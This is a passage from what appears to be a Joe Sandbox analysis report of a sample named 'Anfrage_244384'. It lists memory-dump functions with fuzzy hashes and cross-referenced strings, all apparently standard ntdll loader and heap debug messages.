Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ab4e0521caf604cff7a71cd700b168f6be9bc960320780535d1338b54f492b
Instruction ID: fda5a660ad943a54a58a800fd0c8fec56d2148cec87983b81365daf2b3d4188c
Opcode Fuzzy Hash: 06ab4e0521caf604cff7a71cd700b168f6be9bc960320780535d1338b54f492b
Instruction Fuzzy Hash: D190026120240003411579994414626400A8BE0206B55D022E1015550EC526CD956125

Function 346B2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5f66220977bbb7fb4cab5d9080d6563245f7f7805860e2d3aaa6fd4f241ef7
Instruction ID: 643d3432936743f8ff6bc72c90e85ab5f7f4a10cace29c4078676f23ad0597b9
Opcode Fuzzy Hash: 2e5f66220977bbb7fb4cab5d9080d6563245f7f7805860e2d3aaa6fd4f241ef7
Instruction Fuzzy Hash: 5F90023120544842D15079994404A5600158BD030AF55D012A0065654E9626CE59B661

Function 346B2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12e53f8ffe771028309d8e7a155df49936733eed857473b69054b63b489ad74
Instruction ID: 03b74321d9d2b12edadf138fff53c3c0b8c471c01db4ede4b7ba3c602b93c3b3
Opcode Fuzzy Hash: a12e53f8ffe771028309d8e7a155df49936733eed857473b69054b63b489ad74
Instruction Fuzzy Hash: 2D90023120140802D1907999440465A00058BD1306F95D016A0026614ECA16CF5D77A1

Function 346B2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44dd0ce671bd04dc8a5ca2d3bbe7958715e5769c91dc226f9e3048e335c631e
Instruction ID: f9ac429198b28f5af858ecb90df12c9a1624e0045a2e109358468cfe36a5e2e2
Opcode Fuzzy Hash: d44dd0ce671bd04dc8a5ca2d3bbe7958715e5769c91dc226f9e3048e335c631e
Instruction Fuzzy Hash: 5990023160540802D1607999441475600058BD0306F55D012A0025614E8756CF5976A1

Function 346B2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890b2006e4f2ef5f82ff9b7dc0372f8579f1d978aa78eac0f83000700449c0fd
Instruction ID: 6d900c2dc2bf46ab4aa757c9ef217c06d127d8588e92ed10a10e82abd1fd543c
Opcode Fuzzy Hash: 890b2006e4f2ef5f82ff9b7dc0372f8579f1d978aa78eac0f83000700449c0fd
Instruction Fuzzy Hash: 7E90023120140802D1147999480469600058BD0306F55D012A6025615F9666CD957131

Function 346B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1d47ebabec2134605d8994eb9da03562b87663d08b756b09d9aada1dfba88c44
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 346B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 346B293C
___swprintf_l.LIBCMT ref: 346B295E
___swprintf_l.LIBCMT ref: 346B29A3
___swprintf_l.LIBCMT ref: 346EA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 346EA54E
:%u.%u.%u.%u, xrefs: 346EA5B8
ffff:, xrefs: 346EA504
::%hs%u.%u.%u.%u, xrefs: 346EA527

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 51e5c18d817e04535d3531d7832774a35c94b00442cf111c8b2ad9618b3a94f4
Instruction ID: c9595375d08538b881c5996de0be8c86363ff776375ccdad5098479ac97a7eb9
Opcode Fuzzy Hash: 51e5c18d817e04535d3531d7832774a35c94b00442cf111c8b2ad9618b3a94f4
Instruction Fuzzy Hash: 7D5116B5A00216AFEF10DF9AC99497EF7F8FB482407508169E4EAD3241D634DE448BE0

Function 34722410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 347224A6
___swprintf_l.LIBCMT ref: 347224E2
___swprintf_l.LIBCMT ref: 3472257D
___swprintf_l.LIBCMT ref: 347225A3
___swprintf_l.LIBCMT ref: 347225C8
___swprintf_l.LIBCMT ref: 34722608

Strings

:%u.%u.%u.%u, xrefs: 347225FF
::ffff:0:%u.%u.%u.%u, xrefs: 347224DA
ffff:, xrefs: 3472247D, 3472249D
::%hs%u.%u.%u.%u, xrefs: 3472249E

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 53cf9cd97378debcc4c5f5983b644b530190df4120b42b2c9938c8051687e2b6
Instruction ID: e9ee1eb83e79768a0ef279738cef3e401d72a44179c982e7e7def1e661b3002e
Opcode Fuzzy Hash: 53cf9cd97378debcc4c5f5983b644b530190df4120b42b2c9938c8051687e2b6
Instruction Fuzzy Hash: C351C575A00A4AAFEB20CE99C99097EB7F9EF44244B40849DE495DB741EA74DE40CBA0

Function 3474A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 3474A6DD
RtlDebugPrintTimes.NTDLL ref: 3474A771
RtlDebugPrintTimes.NTDLL ref: 3474A794
RtlDebugPrintTimes.NTDLL ref: 3474A7C0
RtlDebugPrintTimes.NTDLL ref: 3474A895
RtlDebugPrintTimes.NTDLL ref: 3474A8E8
RtlDebugPrintTimes.NTDLL ref: 3474A907
RtlDebugPrintTimes.NTDLL ref: 3474A938

Strings

HEAP: , xrefs: 3474A686

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: b9f9492dff2013d65244678c9bfc4eb1843bdca7639a133549e349d7a27a2ebe
Instruction ID: 7fc5a6237ba72598fd2591518aa9dbbe0097d85303fd863a7b8381fa51b4c6b9
Opcode Fuzzy Hash: b9f9492dff2013d65244678c9bfc4eb1843bdca7639a133549e349d7a27a2ebe
Instruction Fuzzy Hash: 39A17BB5B043118FD716CE28C891A2AB7EAFF88360F15496DE945DB351EB30EC46CB91

Function 346A7630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 346E4787
ExecuteOptions, xrefs: 346E46A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 346E46FC
Execute=1, xrefs: 346E4713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 346E4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 346E4655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 346E4725

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 49e1957318d09a390e0c9e1dce70ed908641428d7f4b0809aa5030c66714d37d
Instruction ID: a5166b12f42c4f7fef11b77ad50a99164cc15f71036baa7d407f48c59d046f45
Opcode Fuzzy Hash: 49e1957318d09a390e0c9e1dce70ed908641428d7f4b0809aa5030c66714d37d
Instruction Fuzzy Hash: D65114B5B00619AFEF10AFA4DC89BEA77B8EF14342F4400E9E504A7190EB31EE458F55

Function 3468A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 346D7AE6
Actx , xrefs: 346D7A0C, 346D7A73
RtlpFindActivationContextSection_CheckParameters, xrefs: 346D79D0, 346D79F5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 346D79FA
SsHd, xrefs: 3468A3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 346D79D5

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: b5cb9ff602e5e2dbbfa24f0be27af3a4452d917c1293dc4ec5873d919ed7b90a
Instruction ID: 8fd3152e0dedc7f8401db95de8cb9fc29442c08bbe631a05cf1feb72bf3da696
Opcode Fuzzy Hash: b5cb9ff602e5e2dbbfa24f0be27af3a4452d917c1293dc4ec5873d919ed7b90a
Instruction Fuzzy Hash: DEE1BDB57043028FE710CE24CC94B1AB7E5EB95364F544A2DEDA5CB290EB31D985CB83

Function 346EFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346EFE73
RtlDebugPrintTimes.NTDLL ref: 346EFE95

Strings

LdrpRedirectDelayloadFailure, xrefs: 346EFDDE
Unknown, xrefs: 346EFDC2, 346EFDD4
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 346EFDD8
$, xrefs: 346EFE3D
minkernel\ntdll\ldrdload.c, xrefs: 346EFDE8

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 8ad62fa7dfbc5344dc86daba1896e627d6d8644e7c90dbf9d725d7872f01f4b2
Instruction ID: 77becda829cce8e60cec9e8da173a37bfa55b3b29f432f70de3e496a392dc991
Opcode Fuzzy Hash: 8ad62fa7dfbc5344dc86daba1896e627d6d8644e7c90dbf9d725d7872f01f4b2
Instruction Fuzzy Hash: 36417EB9A02208BBDB05DF95CA80AEEBBF9FF58354F100059E904A7341D731E991CF90

Function 346665B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34666664
RtlDebugPrintTimes.NTDLL ref: 346666AF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 346C9AC5, 346C9B06
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 346C9AF6
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 346C9AB4
LdrpLoadShimEngine, xrefs: 346C9ABB, 346C9AFC

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 2e629b9c340e72a23a1eec932c423ab8ff9843a347ebbcc85bda09205e25f778
Instruction ID: 28a370498e8eab2ab2ffa5b7d8e437cb97bd009f9fb637a19c1463318d607542
Opcode Fuzzy Hash: 2e629b9c340e72a23a1eec932c423ab8ff9843a347ebbcc85bda09205e25f778
Instruction Fuzzy Hash: 4151F076700354DFEB14CFA8D898ADDB7A7EB50318F040169E442BB2A5CB789C45CF99

Function 34699803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34699A02

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 346DDCF5
dfv4@3v4@3v4, xrefs: 3469998D
LdrpUnloadNode, xrefs: 346DDCEB
@3v4, xrefs: 34699912
Unmapping DLL "%wZ", xrefs: 346DDCE4

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: @3v4$LdrpUnloadNode$Unmapping DLL "%wZ"$dfv4@3v4@3v4$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3359740643
Opcode ID: 56823eb9fd9fcabc60bef1ac083edd3461b7c6b4e6f7a29e65d3ac632bafdecb
Instruction ID: f546ef3889c954475216a346e48271088a06f50febd7f2a10db06809ba02a1db
Opcode Fuzzy Hash: 56823eb9fd9fcabc60bef1ac083edd3461b7c6b4e6f7a29e65d3ac632bafdecb
Instruction Fuzzy Hash: A45103B1300301DFF714DF24C984BA9B7EABB94314F040A2DE8959B391DBB4A849CF96

Function 3469DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346DF611

Strings

Invalid heap signature for heap at %p, xrefs: 346DF653
RtlUnlockHeap, xrefs: 346DF65D
, passed to %s, xrefs: 346DF662
HEAP[%wZ]: , xrefs: 346DF63A
HEAP: , xrefs: 346DF647

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 5cca3921bc59e81882e4007d0d812d5fbf93708286600c5b47667776aa074249
Instruction ID: d4c07e4ed9f8a303611a0eb8ae608d62d8adda4f26c11c01024f9968becc0ae5
Opcode Fuzzy Hash: 5cca3921bc59e81882e4007d0d812d5fbf93708286600c5b47667776aa074249
Instruction Fuzzy Hash: FA4148B5600780DFE705CF24C8A4B9AB7F8EF16764F10857DD4015BB92CBB8A880CB92

Function 3471F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3471F250
RtlDebugPrintTimes.NTDLL ref: 3471F2C5

Strings

Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3471F263
---------------------------------------, xrefs: 3471F279
Entry Heap Size , xrefs: 3471F26D
HEAP: , xrefs: 3471F15D

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 89672f80b079c8cf8d3881bc1fb23601df63dcd109d2ec4de41a040800a2d6eb
Instruction ID: 6c9a9a915d5dcaf449b8f9378b6e271fc74de8429185d9af2c763d817504d2e4
Opcode Fuzzy Hash: 89672f80b079c8cf8d3881bc1fb23601df63dcd109d2ec4de41a040800a2d6eb
Instruction Fuzzy Hash: BD417979A00215DFD704CF19C884999BBEAFB4A3587258169D409AF312DB35EC03CB98

Function 3469DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346DF757

Strings

Invalid heap signature for heap at %p, xrefs: 346DF799
, passed to %s, xrefs: 346DF7A8
HEAP[%wZ]: , xrefs: 346DF780
HEAP: , xrefs: 346DF78D
RtlLockHeap, xrefs: 346DF7A3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 35f7e610372c4cb960243c28175bcf09788857b8086e5fde9b12bbaeef444f62
Instruction ID: 83269bb8b44dcaa199a96b69b121cb1ee0ea920d651160095c983226aaff9755
Opcode Fuzzy Hash: 35f7e610372c4cb960243c28175bcf09788857b8086e5fde9b12bbaeef444f62
Instruction Fuzzy Hash: F031F7B5204784DFF716CF24C818BD67BECEF02764F0041A9E44257B52CBF8A880CA56

Function 346BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 346BB6BF

Strings

0, xrefs: 346BB695
0, xrefs: 346BB66F
-, xrefs: 346BB650
+, xrefs: 346BB65A

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 0d4918bb86ca9ddf814a4ef09ca7a5850935e574e91095ad1c05830bc416cff6
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: B9810378F013598EEF04CF6AC8917EEBBB1AF55B50F54412ED8E0A7A91DB308840CB52

Function 34679126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346D2559

Strings

$, xrefs: 34679191
@, xrefs: 34679175

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 770c58acc04a1f8f934d3cfa8351f61c857d6c24199c33d5535f5e0e47e3a3db
Instruction ID: 8cf97e760641b13827a57551244cedc9d69d6df646662fd8e8bd5c95b4379821
Opcode Fuzzy Hash: 770c58acc04a1f8f934d3cfa8351f61c857d6c24199c33d5535f5e0e47e3a3db
Instruction Fuzzy Hash: F88129B5D00269DFEB21CF54CC44BDAB7B8AF09750F1041EAA91AB7240E7309E85CFA5

Function 346A4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346A4D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 346E3640, 346E366C
LdrpFindDllActivationContext, xrefs: 346E3636, 346E3662
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 346E362F
Querying the active activation context failed with status 0x%08lx, xrefs: 346E365C

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: a6415a67b741244a2ac7027aea53ce2f0bba23630a0cc1e86dae4dd232228fc4
Instruction ID: 172a1604456079f70c20112dfc465ede69fe2fe1dd658c77657257993a2e0cdf
Opcode Fuzzy Hash: a6415a67b741244a2ac7027aea53ce2f0bba23630a0cc1e86dae4dd232228fc4
Instruction Fuzzy Hash: AD31E6F6A00B11FFEB11BF14CC88A6573A9EB517A4F42416FE40467661DBA09CC0CA97

Function 3469245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 346DA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 346DA992
TGd4, xrefs: 34692462
LdrpDynamicShimModule, xrefs: 346DA998

Memory Dump Source

